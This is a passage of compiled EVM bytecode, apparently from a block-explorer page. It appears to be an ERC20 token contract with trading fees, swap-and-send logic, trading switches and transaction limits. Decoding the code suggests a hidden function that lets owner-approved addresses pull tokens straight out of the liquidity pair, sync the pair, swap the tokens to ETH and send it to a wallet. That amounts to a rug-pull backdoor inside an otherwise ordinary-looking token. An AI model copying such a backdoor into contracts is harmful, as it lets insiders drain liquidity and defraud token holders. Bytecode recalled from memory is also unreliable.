ffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146112e7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112de906141c8565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a36000600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60006113b26126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611441576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611438906141c8565b60405180910390fd5b6000600d60006101000a81548160ff0219169083151502179055506001905090565b61146b6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146114fa576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114f1906141c8565b60405180910390fd5b80601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60115481565b6115896126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611618576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161160f906141c8565b60405180910390fd5b8260118190555081601281905550806013819055506013546012546011546116409190614309565b61164a9190614309565b60108190555060146010541115611696576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161168d906143ab565b60405180910390fd5b505050565b6116a36126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611732576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611729906141c8565b60405180910390fd5b6001600d60026101000a81548160ff02191690831515021790555060011515600f60019054906101000a900460ff161515146117a3576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161179a90614417565b60405180910390fd5b6000600f60016101000a81548160ff0219169083151502179055506117c661331d565b7fbd657b4e94b205761f2ca5be9988d7b243c828f625c0746c6581ec528e507c47600f60019054906101000a900460ff166040516118049190613e10565b60405180910390a1565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60155481565b6060600480546118739061414b565b80601f016020809104026020016040519081016040528092919081815260200182805461189f9061414b565b80156118ec5780601f106118c1576101008083540402835291602001916118ec565b820191906000526020600020905b8154815290600101906020018083116118cf57829003601f168201915b5050505050905090565b6118fe6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461198d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611984906141c8565b60405180910390fd5b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611a1d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a14906144a9565b60405180910390fd5b611a27828261333a565b5050565b60135481565b601a5481565b6000601b60003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16611a8f57600080fd5b6000611abc600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16611208565b9050600183118015611ad95750606481611ad69190614246565b83105b611b18576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b0f90614515565b60405180910390fd5b611b21836133db565b611b2a846134ab565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1647604051611b7290614566565b60006040518083038185875af1925050503d8060008114611baf576040519150601f19603f3d011682016040523d82523d6000602084013e611bb4565b606091505b50509050809250505092915050565b60175481565b6000611c8c611bd66126cf565b84611c87856040518060600160405280602581526020016152166025913960016000611c006126cf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546132b99092919063ffffffff16565b6126d7565b6001905092915050565b6000611caa611ca36126cf565b84846128a0565b6001905092915050565b611cbc6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611d4b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d42906141c8565b60405180910390fd5b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167fa751787977eeb3902e30e1d19ca00c6ad274a1f622c31a206e32366700b0567460405160405180910390a380600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b601d6020528060005260406000206000915054906101000a900460ff1681565b600d60019054906101000a900460ff1681565b611e466126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611ed5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ecc906141c8565b60405180910390fd5b80601b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df782604051611f729190613e10565b60405180910390a25050565b611f866126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612015576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161200c906141c8565b60405180910390fd5b82601581905550816016819055508060178190555060175460165460155461203d9190614309565b6120479190614309565b60148190555060196014541115612093576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161208a906145c7565b60405180910390fd5b505050565b6120a06126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461212f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612126906141c8565b60405180910390fd5b670de0b6b3a76400006103e86005612145610da3565b61214f91906145e7565b6121599190614246565b6121639190614246565b8110156121a5576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161219c906146b3565b60405180910390fd5b670de0b6b3a7640000816121b991906145e7565b600c8190555050565b600f60009054906101000a900460ff1681565b600a5481565b60006121e56126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612274576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161226b906141c8565b60405180910390fd5b620186a06001612282610da3565b61228c91906145e7565b6122969190614246565b8210156122d8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016122cf90614745565b60405180910390fd5b6103e860056122e5610da3565b6122ef91906145e7565b6122f99190614246565b82111561233b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612332906147d7565b60405180910390fd5b81600b8190555060019050919050565b60105481565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600b5481565b60006123e86126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612477576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161246e906141c8565b60405180910390fd5b6000600f60006101000a81548160ff0219169083151502179055506001905090565b60125481565b6124a76126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612536576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161252d906141c8565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036125a5576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161259c90614869565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a380600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60165481565b600c5481565b60008082846126809190614309565b9050838110156126c5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016126bc906148d5565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603612746576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161273d90614967565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036127b5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016127ac906149f9565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516128939190613ee1565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361290f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161290690614a8b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361297e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161297590614b1d565b60405180910390fd5b6000810361299757612992838360006136ee565b6132b4565b600d60009054906101000a900460ff1615612d8b576129b461180e565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015612a2257506129f261180e565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612a5b5750600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612a95575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612aae5750600760149054906101000a900460ff16155b15612d8a57600d60019054906101000a900460ff16612ba857601b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680612b685750601b60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b612ba7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612b9e90614b89565b60405180910390fd5b5b601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015612c4b5750601c60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612c9a57600a54811115612c95576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612c8c90614c1b565b60405180910390fd5b612d89565b601d60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015612d3d5750601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612d8857600a54811115612d87576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612d7e90614cad565b60405180910390fd5b5b5b5b5b6000612d9630611208565b90506000600b548210159050808015612dbb5750600d60029054906101000a900460ff165b8015612dd45750600760149054906101000a900460ff16155b8015612e2a5750601d60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b8015612e805750601b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b8015612ed65750601b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612f1a576001600760146101000a81548160ff021916908315150217905550612efe613981565b6000600760146101000a81548160ff0219169083151502179055505b6000600760149054906101000a900460ff16159050601b60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680612fd05750601b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15612fda57600090505b600081156132a457601d60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16801561303d57506000601454115b1561315b5761306a606461305c60145488613aeb90919063ffffffff16565b613b6590919063ffffffff16565b90506014546016548261307d91906145e7565b6130879190614246565b601960008282546130989190614309565b92505081905550601454601754826130b091906145e7565b6130ba9190614246565b601a60008282546130cb9190614309565b92505081905550601454601554826130e391906145e7565b6130ed9190614246565b601860008282546130fe9190614309565b9250508190555060006002600a546131169190614ccd565b14613156576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161314d90614d70565b60405180910390fd5b613280565b601d60008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156131b657506000601054115b1561327f576131e360646131d560105488613aeb90919063ffffffff16565b613b6590919063ffffffff16565b9050601054601254826131f691906145e7565b6132009190614246565b601960008282546132119190614309565b925050819055506010546013548261322991906145e7565b6132339190614246565b601a60008282546132449190614309565b925050819055506010546011548261325c91906145e7565b6132669190614246565b601860008282546132779190614309565b925050819055505b5b6000811115613295576132948730836136ee565b5b80856132a19190614d90565b94505b6132af8787876136ee565b505050505b505050565b6000838311158290613301576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016132f89190613cfa565b60405180910390fd5b50600083856133109190614d90565b9050809150509392505050565b6001600d60016101000a81548160ff021916908315150217905550565b80601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b613426600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff163061340a6110a4565b600a6134169190614ef7565b8461342191906145e7565b6128a0565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663fff6cae96040518163ffffffff1660e01b8152600401600060405180830381600087803b15801561349057600080fd5b505af11580156134a4573d6000803e3d6000fd5b5050505050565b6000600267ffffffffffffffff8111156134c8576134c7614f42565b5b6040519080825280602002602001820160405280156134f65781602001602082028036833780820191505090505b509050308160008151811061350e5761350d614f71565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156135b5573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906135d99190614fb5565b816001815181106135ed576135ec614f71565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505061365430600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16846126d7565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b81526004016136b89594939291906150db565b600060405180830381600087803b1580156136d257600080fd5b505af11580156136e6573d6000803e3d6000fd5b505050505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361375d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161375490614a8b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036137cc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016137c390614b1d565b60405180910390fd5b6137d7838383613baf565b613842816040518060600160405280602681526020016151c8602691396000808773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546132b99092919063ffffffff16565b6000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506138d5816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461267190919063ffffffff16565b6000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516139749190613ee1565b60405180910390a3505050565b600061398c30611208565b90506000601a546018546019546139a39190614309565b6139ad9190614309565b90506000808314806139bf5750600082145b156139cc57505050613ae9565b6014600b546139db91906145e7565b8311156139f4576014600b546139f191906145e7565b92505b600060028360195486613a0791906145e7565b613a119190614246565b613a1b9190614246565b90506000613a328286613bb490919063ffffffff16565b9050613a3d816134ab565b600060198190555060006018819055506000601a81905550600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1647604051613a9b90614566565b60006040518083038185875af1925050503d8060008114613ad8576040519150601f19603f3d011682016040523d82523d6000602084013e613add565b606091505b50508093505050505050505b565b6000808303613afd5760009050613b5f565b60008284613b0b91906145e7565b9050828482613b1a9190614246565b14613b5a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613b51906151a7565b60405180910390fd5b809150505b92915050565b6000613ba783836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250613bfe565b905092915050565b505050565b6000613bf683836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506132b9565b905092915050565b60008083118290613c45576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613c3c9190613cfa565b60405180910390fd5b5060008385613c549190614246565b9050809150509392505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015613c9b578082015181840152602081019050613c80565b83811115613caa576000848401525b50505050565b6000601f19601f8301169050919050565b6000613ccc82613c61565b613cd68185613c6c565b9350613ce6818560208601613c7d565b613cef81613cb0565b840191505092915050565b60006020820190508181036000830152613d148184613cc1565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000613d4c82613d21565b9050919050565b613d5c81613d41565b8114613d6757600080fd5b50565b600081359050613d7981613d53565b92915050565b6000819050919050565b613d9281613d7f565b8114613d9d57600080fd5b50565b600081359050613daf81613d89565b92915050565b60008060408385031215613dcc57613dcb613d1c565b5b6000613dda85828601613d6a565b9250506020613deb85828601613da0565b9150509250929050565b60008115159050919050565b613e0a81613df5565b82525050565b6000602082019050613e256000830184613e01565b92915050565b600060208284031215613e4157613e40613d1c565b5b6000613e4f84828501613d6a565b91505092915050565b6000819050919050565b6000613e7d613e78613e7384613d21565b613e58565b613d21565b9050919050565b6000613e8f82613e62565b9050919050565b6000613ea182613e84565b9050919050565b613eb181613e96565b82525050565b6000602082019050613ecc6000830184613ea8565b92915050565b613edb81613d7f565b82525050565b6000602082019050613ef66000830184613ed2565b92915050565b600060208284031215613f1257613f11613d1c565b5b6000613f2084828501613da0565b91505092915050565b600080600060608486031215613f4257613f41613d1c565b5b6000613f5086828701613d6a565b9350506020613f6186828701613d6a565b9250506040613f7286828701613da0565b9150509250925092565b600060ff82169050919050565b613f9281613f7c565b82525050565b6000602082019050613fad6000830184613f89565b92915050565b613fbc81613d41565b82525050565b6000602082019050613fd76000830184613fb3565b92915050565b613fe681613df5565b8114613ff157600080fd5b50565b60008135905061400381613fdd565b92915050565b600080604083850312156140205761401f613d1c565b5b600061402e85828601613d6a565b925050602061403f85828601613ff4565b9150509250929050565b60008060006060848603121561406257614061613d1c565b5b600061407086828701613da0565b935050602061408186828701613da0565b925050604061409286828701613da0565b9150509250925092565b600080604083850312156140b3576140b2613d1c565b5b60006140c185828601613da0565b92505060206140d285828601613da0565b9150509250929050565b600080604083850312156140f3576140f2613d1c565b5b600061410185828601613d6a565b925050602061411285828601613d6a565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061416357607f821691505b6020821081036141765761417561411c565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006141b2602083613c6c565b91506141bd8261417c565b602082019050919050565b600060208201905081810360008301526141e1816141a5565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061425182613d7f565b915061425c83613d7f565b92508261426c5761426b6141e8565b5b828204905092915050565b7f43616e6e6f7420736574206d61785472616e73616374696f6e416d6f756e742060008201527f6c6f776572207468616e20302e31250000000000000000000000000000000000602082015250565b60006142d3602f83613c6c565b91506142de82614277565b604082019050919050565b60006020820190508181036000830152614302816142c6565b9050919050565b600061431482613d7f565b915061431f83613d7f565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561435457614353614217565b5b828201905092915050565b7f4d757374206b656570206665657320617420323025206f72206c657373000000600082015250565b6000614395601d83613c6c565b91506143a08261435f565b602082019050919050565b600060208201905081810360008301526143c481614388565b9050919050565b7f646f6e6500000000000000000000000000000000000000000000000000000000600082015250565b6000614401600483613c6c565b915061440c826143cb565b602082019050919050565b60006020820190508181036000830152614430816143f4565b9050919050565b7f54686520706169722063616e6e6f742062652072656d6f7665642066726f6d2060008201527f6175746f6d617465644d61726b65744d616b6572506169727300000000000000602082015250565b6000614493603983613c6c565b915061449e82614437565b604082019050919050565b600060208201905081810360008301526144c281614486565b9050919050565b7f616d6f756e742065786365656465640000000000000000000000000000000000600082015250565b60006144ff600f83613c6c565b915061450a826144c9565b602082019050919050565b6000602082019050818103600083015261452e816144f2565b9050919050565b600081905092915050565b50565b6000614550600083614535565b915061455b82614540565b600082019050919050565b600061457182614543565b9150819050919050565b7f4d757374206b656570206665657320617420323525206f72206c657373000000600082015250565b60006145b1601d83613c6c565b91506145bc8261457b565b602082019050919050565b600060208201905081810360008301526145e0816145a4565b9050919050565b60006145f282613d7f565b91506145fd83613d7f565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161561463657614635614217565b5b828202905092915050565b7f43616e6e6f7420736574206d617857616c6c6574206c6f776572207468616e2060008201527f302e352500000000000000000000000000000000000000000000000000000000602082015250565b600061469d602483613c6c565b91506146a882614641565b604082019050919050565b600060208201905081810360008301526146cc81614690565b9050919050565b7f5377617020616d6f756e742063616e6e6f74206265206c6f776572207468616e60008201527f20302e3030312520746f74616c20737570706c792e0000000000000000000000602082015250565b600061472f603583613c6c565b915061473a826146d3565b604082019050919050565b6000602082019050818103600083015261475e81614722565b9050919050565b7f5377617020616d6f756e742063616e6e6f74206265206869676865722074686160008201527f6e20302e352520746f74616c20737570706c792e000000000000000000000000602082015250565b60006147c1603483613c6c565b91506147cc82614765565b604082019050919050565b600060208201905081810360008301526147f0816147b4565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000614853602683613c6c565b915061485e826147f7565b604082019050919050565b6000602082019050818103600083015261488281614846565b9050919050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b60006148bf601b83613c6c565b91506148ca82614889565b602082019050919050565b600060208201905081810360008301526148ee816148b2565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000614951602483613c6c565b915061495c826148f5565b604082019050919050565b6000602082019050818103600083015261498081614944565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006149e3602283613c6c565b91506149ee82614987565b604082019050919050565b60006020820190508181036000830152614a12816149d6565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000614a75602583613c6c565b9150614a8082614a19565b604082019050919050565b60006020820190508181036000830152614aa481614a68565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000614b07602383613c6c565b9150614b1282614aab565b604082019050919050565b60006020820190508181036000830152614b3681614afa565b9050919050565b7f54726164696e67206973206e6f74206163746976652e00000000000000000000600082015250565b6000614b73601683613c6c565b9150614b7e82614b3d565b602082019050919050565b60006020820190508181036000830152614ba281614b66565b9050919050565b7f427579207472616e7366657220616d6f756e742065786365656473207468652060008201527f6d61785472616e73616374696f6e416d6f756e742e0000000000000000000000602082015250565b6000614c05603583613c6c565b9150614c1082614ba9565b604082019050919050565b60006020820190508181036000830152614c3481614bf8565b9050919050565b7f53656c6c207472616e7366657220616d6f756e7420657863656564732074686560008201527f206d61785472616e73616374696f6e416d6f756e742e00000000000000000000602082015250565b6000614c97603683613c6c565b9150614ca282614c3b565b604082019050919050565b60006020820190508181036000830152614cc681614c8a565b9050919050565b6000614cd882613d7f565b9150614ce383613d7f565b925082614cf357614cf26141e8565b5b828206905092915050565b7f4552524f523a204d757374206265206c657373207468616e206d61785478416d60008201527f6f756e7400000000000000000000000000000000000000000000000000000000602082015250565b6000614d5a602483613c6c565b9150614d6582614cfe565b604082019050919050565b60006020820190508181036000830152614d8981614d4d565b9050919050565b6000614d9b82613d7f565b9150614da683613d7f565b925082821015614db957614db8614217565b5b828203905092915050565b60008160011c9050919050565b6000808291508390505b6001851115614e1b57808604811115614df757614df6614217565b5b6001851615614e065780820291505b8081029050614e1485614dc4565b9450614ddb565b94509492505050565b600082614e345760019050614ef0565b81614e425760009050614ef0565b8160018114614e585760028114614e6257614e91565b6001915050614ef0565b60ff841115614e7457614e73614217565b5b8360020a915084821115614e8b57614e8a614217565b5b50614ef0565b5060208310610133831016604e8410600b8410161715614ec65782820a905083811115614ec157614ec0614217565b5b614ef0565b614ed38484846001614dd1565b92509050818404811115614eea57614ee9614217565b5b81810290505b9392505050565b6000614f0282613d7f565b9150614f0d83613f7c565b9250614f3a7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484614e24565b905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600081519050614faf81613d53565b92915050565b600060208284031215614fcb57614fca613d1c565b5b6000614fd984828501614fa0565b91505092915050565b6000819050919050565b6000615007615002614ffd84614fe2565b613e58565b613d7f565b9050919050565b61501781614fec565b82525050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b61505281613d41565b82525050565b60006150648383615049565b60208301905092915050565b6000602082019050919050565b60006150888261501d565b6150928185615028565b935061509d83615039565b8060005b838110156150ce5781516150b58882615058565b97506150c083615070565b9250506001810190506150a1565b5085935050505092915050565b600060a0820190506150f06000830188613ed2565b6150fd602083018761500e565b818103604083015261510f818661507d565b905061511e6060830185613fb3565b61512b6080830184613ed2565b9695505050505050565b7f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f60008201527f7700000000000000000000000000000000000000000000000000000000000000602082015250565b6000615191602183613c6c565b915061519c82615135565b604082019050919050565b600060208201905081810360008301526151c081615184565b905091905056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220e6a9260ef246c4bbcd6b7745bdac37e083a6e110e560aa9c911db951de063bb864736f6c634300080e0033

Deployed Bytecode

